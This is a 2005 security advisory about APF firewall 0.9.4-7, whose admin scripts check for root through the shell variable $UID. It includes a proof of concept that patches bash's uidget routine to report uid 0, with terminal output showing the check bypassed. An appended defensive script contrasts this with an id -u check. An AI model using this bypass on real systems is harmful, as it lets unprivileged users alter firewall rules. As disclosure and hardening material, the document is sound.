SB2005002: pron to bypass APF checking uid(0) routine
=====================================================
Date : 01-13-2005
Author : x90c@xxxxxxxxxxxxxxxx/~jyj9782
----- Affected Version -----
apf-0.9.4-7 ( current at this time )
----- Summary -----
APF is a policy based iptables firewall system designed for ease of use and
configuration. It employs a subset of features to satisfy the veteran
Linux user and the novice alike. Packaged in tar.gz and RPM formats, APF is
ideal for deployment in any linux server environment.
Source tarball from the website ( http://www.r-fx.org/apf.php ).
1) Smallest Flaw
When the PoC commands below are executed, local users can bypass the
"root only" check in the scripts. A malicious user could therefore freely
use the admin scripts (apf, firewall, ...) to change rules, start/stop the
daemon and so on.
Very dangerous things can come from the smallest flaws.
However, this may not be exploitable in practice, because the program ships
with install.sh, which contains "chmod 750 $INSPATH/firewall". I still want
to point out the potential problem.
----- PoC -----
STEP 1) Patch your bash source (vi shell.c +1099) as below.
    + u = 0;
    + current_user.gid = 0;
    + current_user.euid = 0;
    + current_user.egid = 0;

-shell.c +1099-

static int
uidget ()
{
  uid_t u;

  u = 0;                        /* patched: bash calls getuid () here */
  if (current_user.uid != u)
    {
      FREE (current_user.user_name);
      FREE (current_user.shell);
      FREE (current_user.home_dir);
      current_user.user_name = current_user.shell = current_user.home_dir =
        (char *)NULL;
    }
  current_user.uid = u;
  current_user.gid = 0;         /* patched: was getgid () */
  current_user.euid = 0;        /* patched: was geteuid () */
  current_user.egid = 0;        /* patched: was getegid () */

  /* See whether or not we are running setuid or setgid. */
  return (current_user.uid != current_user.euid) ||
         (current_user.gid != current_user.egid);
}
STEP 2) Run the vulnerable scripts (intended for root, uid 0 only) with the patched bash shell.
root@testbed:/home/s/apf-0.9.4-7# ls
CHANGELOG README apf.init files logrotate.d.apf
COPYING.GPL README.antidos cron.daily install.sh
root@testbed:/home/s/apf-0.9.4-7# cd files
root@testbed:/home/s/apf-0.9.4-7/files# ls
VERSION apf deny_hosts.rules extras log.rules
sysctl.rules
ad bt.rules doc firewall main.rules vnet
allow_hosts.rules conf.apf ds_hosts.rules internals preroute.rules
root@testbed:/home/s/apf-0.9.4-7/files# grep "UID" *
apf:if [ "$UID" != "0" ]; then
firewall:if [ "$UID" != "0" ]; then
root@testbed:/home/s/apf-0.9.4-7/files#
I didn't want to install it, so I only tested as below.
root@testbed:/tmp# ls -al b* f*
-rwxr-xr-x 1 pt pt 2969870 2005-01-08 01:23 bash90
-rwxrwxr-x 1 root root 24 2005-01-08 01:23 fake_firewall
root@testbed:/tmp# su pt
pt@testbed:/tmp$ id
uid=1001(pt) gid=1001(pt) groups=1001(pt),101(wheel)
pt@testbed:/tmp$ echo $UID
1001
pt@testbed:/tmp$ ./bash90
root@testbed:/tmp# echo $UID
0
root@testbed:/tmp# id
uid=1001(pt) gid=1001(pt) groups=1001(pt),101(wheel)
root@testbed:/tmp# ./fake_firewall
1001
root@testbed:/tmp# exit
exit
pt@testbed:/tmp$ ./bash90 fake_firewall
0
pt@testbed:/tmp$
----- Solution -----
# cp /bin/id /firewall_path/secure_id
# chmod 700 /firewall_path/secure_id
and change the sources to obtain the uid from the file above.
Alternatively, I recommend upgrading to a new release.
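As an added example (not part of this advisory and not APF's own code), the following POSIX shell script puts the "$UID" style check found by the grep above beside a check that asks id(1), as the Solution suggests, and adds a small audit helper that lists scripts still relying on "$UID". The file names apf, firewall and hardened and their contents are constructed samples modelled on the grep output, not the real APF scripts. The point it shows: "$UID" is a variable that the interpreting shell sets for itself, while "id -u" calls getuid() in a separate process, so the two can disagree when the caller picks the shell binary.

```shell
#!/bin/sh
# Added example for the APF $UID advisory; not code from APF or its author.
# Shows the weak root check, an id(1)-based check, and an audit helper.

# (1) Weak check, the pattern found by 'grep "UID" *': $UID only reflects
#     what the shell interpreting this script chose to report.
require_root_weak() {
    [ "$UID" = "0" ]
}

# (2) Hardened check: id(1) runs as its own process and asks the kernel,
#     so the answer does not depend on which shell binary runs the script.
require_root() {
    [ "$(id -u)" = "0" ]
}

# (3) Audit: print every file under $1 whose contents reference $UID or ${UID}.
find_uid_checks() {
    grep -lE '\$\{?UID' "$1"/* 2>/dev/null
}

# Number of files flagged by find_uid_checks (whitespace stripped for wc -l).
count_uid_checks() {
    find_uid_checks "$1" | wc -l | tr -d ' '
}

# Constructed sample tree: two scripts with the weak check, one hardened.
# Single-quoted printf formats keep $UID and $(id -u) literal in the files.
make_samples() {
    dir=$(mktemp -d)
    printf '#!/bin/sh\nif [ "$UID" != "0" ]; then exit 1; fi\n' > "$dir/apf"
    printf '#!/bin/sh\nif [ "$UID" != "0" ]; then exit 1; fi\n' > "$dir/firewall"
    printf '#!/bin/sh\nif [ "$(id -u)" != "0" ]; then exit 1; fi\n' > "$dir/hardened"
    echo "$dir"
}

SAMPLES=$(make_samples)
echo "scripts whose root check trusts \$UID:"
find_uid_checks "$SAMPLES"
echo "count: $(count_uid_checks "$SAMPLES")"
if require_root_weak; then echo "weak check: root"; else echo "weak check: not root"; fi
if require_root; then echo "id -u check: root"; else echo "id -u check: not root"; fi
rm -rf "$SAMPLES"
```

Under a shell that does not define UID at all (plain /bin/sh on many systems), the weak check reports "not root" even for uid 0, which is the other side of the same problem: the check tests shell state, not the process credentials.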
----- Credits -----
This small flaw was found by x90c (Kyong Joo, Jung) personally.